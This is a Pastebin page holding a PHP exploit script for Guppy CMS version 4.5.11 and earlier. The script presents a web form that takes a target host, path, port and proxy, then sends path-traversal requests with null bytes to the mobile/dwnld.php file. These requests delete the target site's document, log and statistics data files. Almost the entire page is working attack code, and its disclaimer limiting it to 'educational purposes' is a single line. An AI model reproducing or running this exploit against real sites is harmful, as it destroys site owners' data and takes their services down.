API tools faq
paste
Advertisement
Aluf

Guppy-(Delete Databases) Remote Denial of Service

Aluf
Jan 31st, 2015
407
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.14 KB | None | 0 0
raw download clone embed print report
  1. # Change line 30 s/htp/http if you would like to see the logo. /str0ke
  2.  
  3. <?php
  4. #                    Guppy <= 4.5.11 Remote DOS Exploit                       #
  5. #                               by Aluf                                       #
  6. #             Computer Security Science Researchers Institute                 #
  7. #                           [http://www.KAPDA.ir]                             #
  8. #                                                                             #
  9.  
  10. error_reporting(0);
  11. ini_set("max_execution_time",0);
  12. ini_set("default_socket_timeout", 5);
  13. ob_implicit_flush (1);
  14.  
  15. echo'<html>
  16. <head>
  17. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  18. <title>Guppy &lt;= 4.5.11 Remote DOS Exploit</title>
  19. </head>
  20.  
  21. <body bgcolor="#FFCCFF">
  22.  
  23. <p align="center"><font size="4" color="#0000FF">Guppy &lt;= 4.5.11 Remote DOS
  24. Exploit</font></p>
  25. <p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
  26. <p align="center"><font size="4" color="#008000">Computer Security Science Researchers
  27. Institute</font></p>
  28. <font SIZE="3">
  29. <p align="center"><a href="http://www.kapda.ir">KAPDA</a></p>
  30. <p align="center"><img border="0" src="http://irannetjob.com/pics/ph-logo.png" width="120" height="121"></p>
  31. </font>
  32. <table width="90%">
  33.  <tbody>
  34.    <tr>
  35.      <td width="43%" align="left">
  36.        <form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
  37.          <p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex:www.sitename.com)</span></p>
  38.          <p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex:
  39.          /guppy/
  40.          or just / )</span></p>
  41.          <p><input name="num" size="20"> <span class="Stile5">how many document
  42.          do you want to destroy (default is 100)</span></p>
  43.          <p>&nbsp; This option works when magic_quotes_gpc is Off</p>
  44.          <p><input name="port" size="20"><span class="Stile5">specify a port&nbsp;
  45.          (default is 80)</span></p>
  46.          <p><input name="proxy" size="20"><span class="Stile5">send exploit
  47.          through an HTTP proxy (ip:port)</span></p>
  48.          <p align="center"> <span class="Stile5"><font color="#FF0000">&nbsp;&nbsp;
  49.          * </font>fields are required</span></p>
  50.          <p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
  51.          
  52.          <p><input type="submit" value="Start" name="Submit"></p>
  53.        </form>
  54.      </td>
  55.    </tr>
  56.  </tbody>
  57. </table>
  58. </body></html>';
  59. function show($headeri)
  60. {
  61.   $ii=0;$ji=0;$ki=0;$ci=0;
  62.   echo '<table border="0"><tr>';
  63.   while ($ii <= strlen($headeri)-1){
  64.     $datai=dechex(ord($headeri[$ii]));
  65.     if ($ji==16) {
  66.       $ji=0;
  67.       $ci++;
  68.       echo "<td>&nbsp;&nbsp;</td>";
  69.       for ($li=0; $li<=15; $li++) {
  70.         echo "<td>".$headeri[$li+$ki]."</td>";
  71.         }
  72.       $ki=$ki+16;
  73.       echo "</tr><tr>";
  74.     }
  75.     if (strlen($datai)==1) {
  76.       echo "<td>0".$datai."</td>";
  77.     }
  78.     else {
  79.       echo "<td>".$datai."</td> ";
  80.     }
  81.     $ii++;$ji++;
  82.   }
  83.   for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
  84.     echo "<td>&nbsp&nbsp</td>";
  85.   }
  86.   for ($li=$ci*16; $li<=strlen($headeri); $li++) {
  87.     echo "<td>".$headeri[$li]."</td>";
  88.   }
  89.   echo "</tr></table>";
  90. }
  91.  
  92. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
  93.  
  94. function sendpacket()
  95. {
  96.   global $proxy, $host, $port, $packet, $html, $proxy_regex;
  97.   $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  98.   if ($socket < 0) {
  99.     echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
  100.   }
  101.   else {
  102.     $c = preg_match($proxy_regex,$proxy);
  103.     if (!$c) {echo 'Not a valid proxy';
  104.     die;
  105.     }
  106.   echo "OK.<br>";
  107.   echo "Attempting to connect to ".$host." on port ".$port."...<br>";
  108.   if ($proxy=='') {
  109.     $result = socket_connect($socket, $host, $port);
  110.   }
  111.   else {
  112.     $parts =explode(':',$proxy);
  113.     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
  114.     $result = socket_connect($socket, $parts[0],$parts[1]);
  115.   }
  116.   if ($result < 0) {
  117.     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
  118.   }
  119.   else {
  120.     echo "OK.<br><br>";
  121.     $html= '';
  122.     socket_write($socket, $packet, strlen($packet));
  123.     echo "Reading response:<br>";
  124.     while ($out= socket_read($socket, 2048)) {$html.=$out;}
  125.     echo nl2br(htmlentities($html));
  126.     echo "Closing socket...";
  127.     socket_close($socket);
  128.   }
  129.   }
  130. }
  131.  
  132. function sendpacketii($packet)
  133. {
  134.   global $proxy, $host, $port, $html, $proxy_regex;
  135.   if ($proxy=='') {
  136.     $ock=fsockopen(gethostbyname($host),$port);
  137.     if (!$ock) {
  138.       echo 'No response from '.htmlentities($host); die;
  139.     }
  140.   }
  141.   else {
  142.     $c = preg_match($proxy_regex,$proxy);
  143.     if (!$c) {
  144.       echo 'Not a valid proxy';die;
  145.     }
  146.     $parts=explode(':',$proxy);
  147.     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
  148.     $ock=fsockopen($parts[0],$parts[1]);
  149.     if (!$ock) {
  150.       echo 'No response from proxy...';die;
  151.     }
  152.   }
  153.   fputs($ock,$packet);
  154.   if ($proxy=='') {
  155.     $html='';
  156.     while (!feof($ock)) {
  157.       $html.=fgets($ock);
  158.     }
  159.   }
  160.   else {
  161.     $html='';
  162.     while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  163.       $html.=fread($ock,1);
  164.     }
  165.   }
  166.   fclose($ock);
  167. }
  168.  
  169. $host=$_POST[host];
  170. $path=$_POST[path];
  171. $port=$_POST[port];
  172. $num=$_POST[num];
  173.  
  174. if (($host<>'') and ($path<>''))
  175. {
  176.   $port=intval(trim($port));
  177.   $num=intval(trim($num));
  178.   if ($port=='') {$port=80;}
  179.   if ($num=='') {$num=100;}
  180.   if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
  181.   if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  182.   $host=str_replace("\r\n","",$host);
  183.   $path=str_replace("\r\n","",$path);
  184.   echo ' Try to see if magic_quotes_gpc is enable! ...';
  185.   $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./test.inc%00"." HTTP/1.1\r\n";
  186.   $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
  187.   $packet.="Host: ".$host."\r\n";
  188.   $packet.="Connection: Close\r\n\r\n";
  189.   show($packet);
  190.   sendpacketii($packet);
  191.   $test='http://'.$host.$path.'data/test.inc';
  192.   if (!include("$test")) {
  193.   echo'It seems magic_quotes_gpc is On. Trying STEP 2 ...';
  194. }
  195.   else {echo'magic_quotes_gpc is disable. STEP 1:';
  196.   for ($n = 1; $n <= $num; $n++) {
  197.   $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./doc".$n.".inc%00"." HTTP/1.1\r\n";
  198.   $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
  199.   $packet.="Host: ".$host."\r\n";
  200.   $packet.="Connection: Close\r\n\r\n";
  201.   show($packet);
  202.   sendpacketii($packet);
  203.   }
  204. }
  205.   echo' STEP 2:';
  206.   for ($n = 1; $n <= 29; $n++) {
  207.   if ($n==1) {$str='ar';} if ($n==2) {$str='counter';} if ($n==3) {$str='dn';} if ($n==4) {$str='docid';} if ($n==5) {$str='fa';}
  208.   if ($n==6) {$str='fr';} if ($n==7) {$str='frcat';} if ($n==8) {$str='frcount';} if ($n==9) {$str='frth';} if ($n==10) {$str='ippoll';}
  209.   if ($n==11) {$str='ipstats';} if ($n==12) {$str='li';} if ($n==13) {$str='log_date';} if ($n==14) {$str='log_files';}
  210.   if ($n==15) {$str='log_stats';} if ($n==16) {$str='logbook';} if ($n==17) {$str='logd';} if ($n==18) {$str='logh';}
  211.   if ($n==19) {$str='logm';} if ($n==20) {$str='logp';} if ($n==21) {$str='logy';} if ($n==22) {$str='nextid';}
  212.   if ($n==23) {$str='nwlist';} if ($n==24) {$str='ph';} if ($n==25) {$str='poll';} if ($n==26) {$str='ra';}
  213.   if ($n==27) {$str='rs';} if ($n==28) {$str='stats';} if ($n==29) {$str='statsbk';}
  214.   $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./$str"." HTTP/1.1\r\n";
  215.   $packet.="User-Agent: SnoopRob/x.x\r\n";
  216.   $packet.="Host: ".$host."\r\n";
  217.   $packet.="Connection: Close\r\n\r\n";
  218.   show($packet);
  219.   sendpacketii($packet);
  220.   }
  221.   $test2='http://'.$host.$path.'data/stats.dtb';
  222.   include("$test2");
  223.   if (eregi("1",$html)) {echo "Exploit succeeded"; }
  224.                            else {echo "Exploit failed...";}
  225. }
  226. else
  227. {echo "IMPORTANT NOTICE: This POC is just for educational purposes, Please Do not use it against external websites<br>
  228. You are responsible for any damage that .... ";}
  229.  
  230. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!